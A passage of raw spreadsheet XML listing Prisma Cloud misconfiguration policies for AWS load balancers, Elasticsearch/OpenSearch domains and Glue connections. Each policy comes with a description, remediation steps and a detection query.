          <t>PC-AWS-ELB-265-CKV_AWS_92</t>
        </is>
      </c>
      <c r="AD37" t="b">
        <v>1</v>
      </c>
      <c r="AE37" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF37" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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7" t="inlineStr">
        <is>
          <t>b675c604-e886-43aa-a60f-a9ad1f3742d3</t>
        </is>
      </c>
      <c r="AI37" t="inlineStr">
        <is>
          <t>a9ba38da-42c3-414c-911b-57ecbe2d9600</t>
        </is>
      </c>
      <c r="AJ37" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK37" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B38" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C38" s="2" t="inlineStr">
        <is>
          <t>Resilience</t>
        </is>
      </c>
      <c r="D38" t="inlineStr"/>
      <c r="E38" t="inlineStr"/>
      <c r="F38" t="inlineStr"/>
      <c r="G38" t="b">
        <v>1</v>
      </c>
      <c r="H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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J38" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K38" t="inlineStr">
        <is>
          <t>AWS Classic Load Balancer not configured to span multiple Availability Zones</t>
        </is>
      </c>
      <c r="L38" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M38" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N38" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O38" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P38" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q38" t="inlineStr">
        <is>
          <t>Recover</t>
        </is>
      </c>
      <c r="R38" t="inlineStr">
        <is>
          <t>Resilience</t>
        </is>
      </c>
      <c r="S38" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Resilience</t>
        </is>
      </c>
      <c r="T38" t="b">
        <v>0</v>
      </c>
      <c r="U38" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V38" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W38" t="inlineStr">
        <is>
          <t>This policy identifies AWS Classic Load Balancers that are not configured to span multiple Availability Zones. Classic Load Balancer would not be able to redirect traffic to targets in another Availability Zone if the sole configured Availability Zone becomes unavailable. As best practice, it is recommended to configure Classic Load Balancer to span multiple Availability Zones.</t>
        </is>
      </c>
      <c r="X38" t="inlineStr">
        <is>
          <t>To configure AWS Classic Load Balancer to span multiple Availability Zones follow the steps mentioned in below URL:
https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/enable-disable-az.html#add-availability-zone</t>
        </is>
      </c>
      <c r="Y38" t="inlineStr"/>
      <c r="Z38" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elb-describe-load-balancers' AND json.rule = description.availabilityZones[*] size less than 2</t>
        </is>
      </c>
      <c r="AA38" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB38" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC38" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-907</t>
        </is>
      </c>
      <c r="AD38" t="b">
        <v>1</v>
      </c>
      <c r="AE38" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF38" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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8" t="inlineStr">
        <is>
          <t>740c318e-b1b5-4e48-8488-946e3ffcc3f7</t>
        </is>
      </c>
      <c r="AI38" t="inlineStr">
        <is>
          <t>6cb05eb7-6021-4f05-9f8d-ed3faab5c19e</t>
        </is>
      </c>
      <c r="AJ38" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK38" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B39" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C39" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D39" t="inlineStr"/>
      <c r="E39" t="inlineStr"/>
      <c r="F39" t="inlineStr"/>
      <c r="G39" t="b">
        <v>1</v>
      </c>
      <c r="H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9" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J39" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K39" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer (Classic) SSL negotiation policy configured with insecure ciphers</t>
        </is>
      </c>
      <c r="L39" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M39" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N39" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O39" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P39" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q39" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R39" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S39" t="inlineStr">
        <is>
          <t>Rehan,Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T39" t="b">
        <v>0</v>
      </c>
      <c r="U39" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V39" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W39" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancers (Classic) which are configured with SSL negotiation policy containing insecure ciphers. An SSL cipher is an encryption algorithm that uses encryption keys to create a coded message. SSL protocols use several SSL ciphers to encrypt data over the Internet. As many of the other ciphers are not secure, it is recommended to use only the ciphers recommended in the following AWS link: https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-ssl-security-policy.html.</t>
        </is>
      </c>
      <c r="X39" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Go to the EC2 Dashboard, and select 'Load Balancers'
4. Click on the reported Load Balancer
5. On 'Listeners' tab, Change the cipher for the 'HTTPS/SSL' rule
For a 'Predefined Security Policy', change 'Cipher' to 'ELBSecurityPolicy-TLS‌-1-2-2017-01' or latest
For a 'Custom Security Policy', select from the secure ciphers as recommended in the below AWS link:
https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-ssl-security-policy.html
6. 'Save' your changes</t>
        </is>
      </c>
      <c r="Y39" t="inlineStr"/>
      <c r="Z39" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elb-describe-load-balancers' AND json.rule = "policies[*].policyAttributeDescriptions[?(@.attributeName=='DHE-RSA-AES128-SHA'|| @.attributeName=='DHE-DSS-AES128-SHA' || @.attributeName=='CAMELLIA128-SHA' || @.attributeName=='EDH-RSA-DES-CBC3-SHA' || @.attributeName=='DES-CBC3-SHA' || @.attributeName=='ECDHE-RSA-RC4-SHA' || @.attributeName=='RC4-SHA' || @.attributeName=='ECDHE-ECDSA-RC4-SHA' || @.attributeName=='DHE-DSS-AES256-GCM-SHA384' || @.attributeName=='DHE-RSA-AES256-GCM-SHA384' || @.attributeName=='DHE-RSA-AES256-SHA256' || @.attributeName=='DHE-DSS-AES256-SHA256' || @.attributeName=='DHE-RSA-AES256-SHA' || @.attributeName=='DHE-DSS-AES256-SHA' || @.attributeName=='DHE-RSA-CAMELLIA256-SHA' || @.attributeName=='DHE-DSS-CAMELLIA256-SHA' || @.attributeName=='CAMELLIA256-SHA' || @.attributeName=='EDH-DSS-DES-CBC3-SHA' || @.attributeName=='DHE-DSS-AES128-GCM-SHA256' || @.attributeName=='DHE-RSA-AES128-GCM-SHA256' || @.attributeName=='DHE-RSA-AES128-SHA256' || @.attributeName=='DHE-DSS-AES128-SHA256' || @.attributeName=='DHE-RSA-CAMELLIA128-SHA' || @.attributeName=='DHE-DSS-CAMELLIA128-SHA' || @.attributeName=='ADH-AES128-GCM-SHA256' || @.attributeName=='ADH-AES128-SHA' || @.attributeName=='ADH-AES128-SHA256' || @.attributeName=='ADH-AES256-GCM-SHA384' || @.attributeName=='ADH-AES256-SHA' || @.attributeName=='ADH-AES256-SHA256' || @.attributeName=='ADH-CAMELLIA128-SHA' || @.attributeName=='ADH-CAMELLIA256-SHA' || @.attributeName=='ADH-DES-CBC3-SHA' || @.attributeName=='ADH-DES-CBC-SHA' || @.attributeName=='ADH-RC4-MD5' || @.attributeName=='ADH-SEED-SHA' || @.attributeName=='DES-CBC-SHA' || @.attributeName=='DHE-DSS-SEED-SHA' || @.attributeName=='DHE-RSA-SEED-SHA' || @.attributeName=='EDH-DSS-DES-CBC-SHA' || @.attributeName=='EDH-RSA-DES-CBC-SHA' || @.attributeName=='IDEA-CBC-SHA' || @.attributeName=='RC4-MD5' || @.attributeName=='SEED-SHA' || @.attributeName=='DES-CBC3-MD5' || @.attributeName=='DES-CBC-MD5' || @.attributeName=='RC2-CBC-MD5' || @.attributeName=='PSK-AES256-CBC-SHA' || @.attributeName=='PSK-3DES-EDE-CBC-SHA' || @.attributeName=='KRB5-DES-CBC3-SHA' || @.attributeName=='KRB5-DES-CBC3-MD5' || @.attributeName=='PSK-AES128-CBC-SHA' || @.attributeName=='PSK-RC4-SHA' || @.attributeName=='KRB5-RC4-SHA' || @.attributeName=='KRB5-RC4-MD5' || @.attributeName=='KRB5-DES-CBC-SHA' || @.attributeName=='KRB5-DES-CBC-MD5' || @.attributeName=='EXP-EDH-RSA-DES-CBC-SHA' || @.attributeName=='EXP-EDH-DSS-DES-CBC-SHA' || @.attributeName=='EXP-ADH-DES-CBC-SHA' || @.attributeName=='EXP-DES-CBC-SHA' || @.attributeName=='EXP-RC2-CBC-MD5' || @.attributeName=='EXP-KRB5-RC2-CBC-SHA' || @.attributeName=='EXP-KRB5-DES-CBC-SHA' || @.attributeName=='EXP-KRB5-RC2-CBC-MD5' || @.attributeName=='EXP-KRB5-DES-CBC-MD5' || @.attributeName=='EXP-ADH-RC4-MD5' || @.attributeName=='EXP-RC4-MD5' || @.attributeName=='EXP-KRB5-RC4-SHA' || @.attributeName=='EXP-KRB5-RC4-MD5')].attributeValue equals true"</t>
        </is>
      </c>
      <c r="AA39" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB39" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC39" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-303</t>
        </is>
      </c>
      <c r="AD39" t="b">
        <v>1</v>
      </c>
      <c r="AE39" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF39" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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9" t="inlineStr">
        <is>
          <t>fed45316-6cae-4dac-aa57-fb451bacb149</t>
        </is>
      </c>
      <c r="AI39" t="inlineStr">
        <is>
          <t>a77b6f74-4e82-47ef-8278-a690e3251e6a</t>
        </is>
      </c>
      <c r="AJ39" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK39" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B40" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C40" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D40" t="inlineStr"/>
      <c r="E40" t="inlineStr"/>
      <c r="F40" t="inlineStr"/>
      <c r="G40" t="b">
        <v>1</v>
      </c>
      <c r="H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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J40" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K40" t="inlineStr">
        <is>
          <t>AWS Elasticsearch domain Encryption for data at rest is disabled</t>
        </is>
      </c>
      <c r="L40" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M40" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N40" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O40" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P40" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q40" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R40" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S40" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T40" t="b">
        <v>0</v>
      </c>
      <c r="U40" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V40" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W40" t="inlineStr">
        <is>
          <t>This policy identifies Elasticsearch domains for which encryption is disabled. Encryption of data at rest is required to prevent unauthorized users from accessing the sensitive information available on your Elasticsearch domains components. This may include all data of file systems, primary and replica indices, log files, memory swap files and automated snapshots. The Elasticsearch uses AWS KMS service to store and manage the encryption keys. It is highly recommended to implement encryption at rest when you are working with production data that have sensitive information, to protect from unauthorized access.</t>
        </is>
      </c>
      <c r="X40" t="inlineStr">
        <is>
          <t>Enabling the encryption feature on existing domains requires Elasticsearch 6.7 or later. If your Elasticsearch 6.7 or later, follow below steps to enable encryption on existing Elasticsearch domain:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Elasticsearch Service Dashboard
4. Choose reported Elasticsearch domain
5. Click on 'Actions' button, from drop-down select 'Modify encryptions'
6.In Modify encryptions page, Select the 'Enable encryption of data at rest' checkbox and Choose KMS key as per your requirement. It is recommended to choose KMS CMKs instead of default KMS [Default(aws/es)]; to get more grannular control on your Elasticsearch domain data.
7. Click on 'Submit'.
If your Elasticsearch is less than 6.7 version, then AWS Elasticsearch Domain encryption can be set only at the time of the creation of domain. So to fix this alert, create a new domain with encryption using KMS Keys and then migrate all required Elasticsearch domain data from the reported Elasticsearch domain to this newly created domain.
To set up the new Elasticsearch domain with encryption using KMS Key, refer the following URL:
https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html
To delete reported ES domain, refer the following URL:
https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-gsg-deleting.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/elastisearch-policies/elasticsearch-3-enable-encryptionatrest
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/elastisearch-policies/elasticsearch-3-enable-encryptionatrest</t>
        </is>
      </c>
      <c r="Y40" t="inlineStr"/>
      <c r="Z40" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = 'processing is false and (encryptionAtRestOptions.enabled is false or encryptionAtRestOptions does not exist)'
{"category":"Elasticsearch","resourceTypes":["aws_elasticsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA40" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB40" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC40" t="inlineStr">
        <is>
          <t>PC-AWS-ES-174-CKV_AWS_5</t>
        </is>
      </c>
      <c r="AD40" t="b">
        <v>1</v>
      </c>
      <c r="AE40" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF40" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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0" t="inlineStr">
        <is>
          <t>0a54c279-d08a-4443-a93b-6d109addd964</t>
        </is>
      </c>
      <c r="AI40" t="inlineStr">
        <is>
          <t>bbd8196f-89c4-4018-8f28-cbad9e2a6841</t>
        </is>
      </c>
      <c r="AJ40" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK40" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B41" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C41" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D41" t="inlineStr"/>
      <c r="E41" t="inlineStr"/>
      <c r="F41" t="inlineStr"/>
      <c r="G41" t="b">
        <v>1</v>
      </c>
      <c r="H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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J41" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K41" t="inlineStr">
        <is>
          <t>AWS Elasticsearch domain is not configured with HTTPS</t>
        </is>
      </c>
      <c r="L41" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M41" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N41" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O41" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P41" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q41" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R41" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S41" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T41" t="b">
        <v>0</v>
      </c>
      <c r="U41" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V41" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W41" t="inlineStr">
        <is>
          <t>This policy identifies Elasticsearch domains that are not configured with HTTPS. Amazon Elasticsearch domains allow all traffic to be submitted over HTTPS, ensuring all communications between application and domain are encrypted. It is recommended to enable HTTPS so that all communication between the application and all data access goes across an encrypted communication channel to eliminate man-in-the-middle attacks.</t>
        </is>
      </c>
      <c r="X41" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the Elasticsearch dashboard
4. Click on reported Elasticsearch domain
5. Click on 'Actions', from drop-down choose 'Modify encryptions'
6. In 'Modify encryptions' page, Select 'Require HTTPS for all traffic to the domain'
7. Click on Submit 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/elastisearch-policies/elasticsearch-6
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/elastisearch-policies/elasticsearch-6</t>
        </is>
      </c>
      <c r="Y41" t="inlineStr"/>
      <c r="Z41" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = processing is false and domainEndpointOptions.enforceHTTPS is false
{"category":"Elasticsearch","resourceTypes":["aws_elasticsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA41" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB41" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC41" t="inlineStr">
        <is>
          <t>PC-AWS-ES-743-CKV_AWS_83</t>
        </is>
      </c>
      <c r="AD41" t="b">
        <v>1</v>
      </c>
      <c r="AE41" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF41" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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1" t="inlineStr">
        <is>
          <t>0dfd7218-7605-4323-a143-8204ca83faea</t>
        </is>
      </c>
      <c r="AI41" t="inlineStr">
        <is>
          <t>10a1868c-c97b-4fd1-8dd3-dc2ac172f2f1</t>
        </is>
      </c>
      <c r="AJ41" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK41" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B42" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C42" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D42" t="inlineStr"/>
      <c r="E42" t="inlineStr"/>
      <c r="F42" t="inlineStr"/>
      <c r="G42" t="b">
        <v>1</v>
      </c>
      <c r="H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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J42" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K42" t="inlineStr">
        <is>
          <t>AWS OpenSearch Fine-grained access control is disabled</t>
        </is>
      </c>
      <c r="L42" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M42" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N42" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O42" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P42" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q42" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R42" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S42" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T42" t="b">
        <v>0</v>
      </c>
      <c r="U42" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V42" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W42" t="inlineStr">
        <is>
          <t>This policy identifies AWS OpenSearch which has Fine-grained access control disabled. Fine-grained access control offers additional ways of controlling access to your data on AWS OpenSearch Service. It is highly recommended enabling fine-grained access control to protect the data on your domain.
For more information, please follow the URL given below,
https://docs.aws.amazon.com/opensearch-service/latest/developerguide/fgac.html</t>
        </is>
      </c>
      <c r="X42" t="inlineStr">
        <is>
          <t>Refer the following URL for configuring Fine-grained access control on your AWS OpenSearch:
https://docs.aws.amazon.com/opensearch-service/latest/developerguide/fgac.html#fgac-forget
Notes: 
1. You can't enable fine-grained access control on existing domains, only new ones. After you enable fine-grained access control, you can't disable it.
2. Fine-grained access control is supported only from ElasticSearch 6.7 or later. To upgrade older versions of AWS OpenSearch please refer to the URL given below,
https://docs.aws.amazon.com/opensearch-service/latest/developerguide/version-migration.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-2-52
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-2-52</t>
        </is>
      </c>
      <c r="Y42" t="inlineStr"/>
      <c r="Z42" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = advancedSecurityOptions.enabled is false and advancedSecurityOptions.internalUserDatabaseEnabled is false
{"category":"IAM","resourceTypes":["aws_opensearch_domain","aws_elasticsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA42" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB42" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC42" t="inlineStr">
        <is>
          <t>PC-AWS-ES-793-CKV2_AWS_52</t>
        </is>
      </c>
      <c r="AD42" t="b">
        <v>1</v>
      </c>
      <c r="AE42" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF42" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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2" t="inlineStr">
        <is>
          <t>45987be9-259e-4940-ae03-351c68b8d3d8</t>
        </is>
      </c>
      <c r="AI42" t="inlineStr">
        <is>
          <t>512be9cc-ed41-4e18-a4ba-c5419c07b5e7</t>
        </is>
      </c>
      <c r="AJ42" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK42" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B43" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C43" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D43" t="inlineStr"/>
      <c r="E43" t="inlineStr"/>
      <c r="F43" t="inlineStr"/>
      <c r="G43" t="b">
        <v>0</v>
      </c>
      <c r="H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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J43" t="inlineStr">
        <is>
          <t>aws-glue</t>
        </is>
      </c>
      <c r="K43" t="inlineStr">
        <is>
          <t>AWS Glue connection do not have SSL configured</t>
        </is>
      </c>
      <c r="L43" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M43" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N43" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O43" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P43" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q43" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R43" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S43" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T43" t="b">
        <v>0</v>
      </c>
      <c r="U43" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V43" t="inlineStr">
        <is>
          <t>aws-glue-connection</t>
        </is>
      </c>
      <c r="W43" t="inlineStr">
        <is>
          <t>This policy identifies the Glue connections that are not configured with SSL to encrypt connections. It is recommended to use an SSL connection with hostname matching is enforced for the DB connection on the client; enforcing SSL connections help protect against 'man in the middle' attacks by encrypting the data stream between connections.</t>
        </is>
      </c>
      <c r="X43" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Navigate to AWS Glue service
4. Click on 'Connections', Click on the reported Connection
5. Click on 'Edit'
6. On the 'Edit connection' page, Select 'Require SSL connection'
7. Click on 'Next'
8. Click on 'Finish'</t>
        </is>
      </c>
      <c r="Y43" t="inlineStr"/>
      <c r="Z43" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-glue-connection' AND json.rule = ((connectionType equals KAFKA and connectionProperties.KAFKA_SSL_ENABLED is false) or (connectionType does not equal KAFKA and connectionProperties.JDBC_ENFORCE_SSL is false)) and connectionType does not equal "NETWORK"</t>
        </is>
      </c>
      <c r="AA43" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB43" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC43" t="inlineStr">
        <is>
          <t>PC-AWS-GLU-647</t>
        </is>
      </c>
      <c r="AD43" t="b">
        <v>1</v>
      </c>
      <c r="AE43" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF43" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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3" t="inlineStr">
        <is>
          <t>47a93d3d-1a0e-4487-97d9-c602338c607c</t>
        </is>
      </c>
      <c r="AI43" t="inlineStr">
        <is>
          <t>e6b6e20f-a443-4d73-8905-6c1af6c49b89</t>
        </is>
      </c>
      <c r="AJ43" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK43" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B44" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C44" s="2" t="inlineStr">
        <is>
